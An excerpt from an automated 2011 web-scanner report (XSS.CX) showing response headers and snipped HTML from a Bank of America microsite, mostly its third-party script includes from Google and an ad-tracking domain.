Link: <http://ahead.bankofamerica.com/?p=11433>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 38290
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/912550/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

Report generated by XSS.CX at Tue Aug 23 06:06:08 GMT-06:00 2011.